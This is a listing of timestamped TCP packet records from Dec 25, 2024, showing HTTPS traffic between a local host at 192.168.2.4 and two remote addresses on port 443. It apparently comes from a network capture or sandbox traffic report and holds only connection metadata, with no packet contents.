                                                                                                                                  Dec 25, 2024 15:09:03.840457916 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.844798088 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.844863892 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.849251032 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.849318981 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.851521969 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.851587057 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.856015921 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.856070042 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.859373093 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.859435081 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.863856077 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.863913059 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.866247892 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.866306067 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.870706081 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.870767117 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.875153065 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.875216961 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.879657984 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.879717112 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.881860018 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.881915092 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.886358023 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.886421919 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.888729095 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.888788939 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.924771070 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.924830914 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.995805979 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.995870113 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:03.996798038 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:03.996855021 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.014492989 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.014513969 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.014553070 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.014554024 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.014580011 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.014590979 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.014617920 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.014633894 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.019901991 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.019959927 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.019973040 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.019989014 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.020014048 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.020035028 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.033821106 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.033844948 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.033895016 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.033902884 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.033938885 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.033951998 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.047957897 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.048002005 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.048019886 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.048027992 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.048047066 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.048065901 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.055546045 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.055607080 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.055608988 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.055635929 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.055663109 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.055685043 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.063007116 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.063054085 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.063079119 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.063085079 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.063117981 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.063133001 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.069494963 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.069540024 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.069561958 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.069570065 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.069595098 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.069613934 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.189394951 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.189464092 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.189471960 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.189501047 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.189527035 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.189548016 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.196433067 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.196484089 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.196505070 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.196523905 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.196552038 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.196562052 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.203346968 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.203391075 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.203403950 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.203430891 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.203439951 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.203466892 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.203474998 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.209319115 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.209342957 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.209378958 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.209387064 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.209410906 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.209436893 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.216283083 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.216305017 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.216350079 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.216356993 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.216372967 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.216391087 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.222708941 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.222731113 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.222769976 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.222779036 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.222803116 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.222815990 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.229929924 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.229962111 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.229991913 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.229999065 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.230021954 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.230043888 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.235563040 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.235585928 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.235654116 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.235654116 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.235662937 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.235696077 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.381464005 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.381491899 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.381526947 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.381539106 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.381556988 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.381572008 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.387845039 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.387868881 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.387902021 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.387909889 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.387933969 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.387952089 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.394689083 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.394710064 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.394747972 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.394754887 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.394788027 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.394805908 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.401681900 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.401707888 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.401751041 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.401757956 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.401797056 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.401797056 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.407654047 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.407686949 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.407716990 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.407725096 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.407749891 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.407769918 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.414087057 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.414115906 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.414153099 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.414159060 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.414186001 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.414206982 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.421091080 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.421109915 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.421160936 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.421169043 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.421201944 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.421209097 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.427819014 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.427841902 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.427875996 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.427882910 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.427911043 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.427931070 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.428761005 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.428817987 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.428823948 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.428868055 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.428868055 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.428917885 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.428998947 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.429017067 CET44349730104.21.38.253192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:04.429023981 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:04.429063082 CET49730443192.168.2.4104.21.38.253
                                                                                                                                  Dec 25, 2024 15:09:07.865180016 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:07.865268946 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:07.865365982 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:07.873745918 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:07.873784065 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.096033096 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.096143961 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.099417925 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.099432945 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.099837065 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.111740112 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.159337044 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.782212019 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.782407045 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.782465935 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.782514095 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.782623053 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.784230947 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.784243107 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.790353060 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.791105032 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.791131020 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.798933029 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.799226046 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.799237967 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.852380991 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.852410078 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.899267912 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.901412010 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.905592918 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.905653000 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.905689001 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.946120977 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.972804070 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.976902962 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.976980925 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.977008104 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.977040052 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.977264881 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.985388041 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.988851070 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.988920927 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.988951921 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.997142076 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:09.997200012 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:09.997217894 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.005376101 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.005440950 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.005455017 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.013777018 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.013858080 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.013875961 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.022228956 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.022305012 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.022322893 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.030747890 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.030819893 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.030829906 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.038964033 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.039113998 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.039122105 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.052665949 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.052743912 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.052776098 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.052784920 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.053006887 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.077605009 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.080940008 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.081007004 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.081044912 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.124700069 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.124753952 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.124758959 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.124788046 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.124846935 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.168299913 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.168322086 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.168365002 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.173082113 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.173202991 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.173218966 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.173330069 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.177880049 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.177938938 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.182588100 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.182655096 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.187501907 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.187580109 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.192236900 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.192296982 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.197010994 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.197066069 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.201937914 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.202003002 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.206618071 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.206684113 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.211476088 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.211525917 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.216162920 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.216229916 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.220925093 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.220978022 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.225656986 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.225719929 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.230432987 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.230489969 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.235286951 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.235352039 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.239757061 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.239806890 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.244452000 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.244512081 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.249356031 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.249413013 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.253988028 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.254055977 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.254086971 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.254139900 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.286868095 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.286933899 CET49734443192.168.2.4104.21.16.1
                                                                                                                                  Dec 25, 2024 15:09:10.286950111 CET44349734104.21.16.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:10.286986113 CET49734443192.168.2.4104.21.16.1
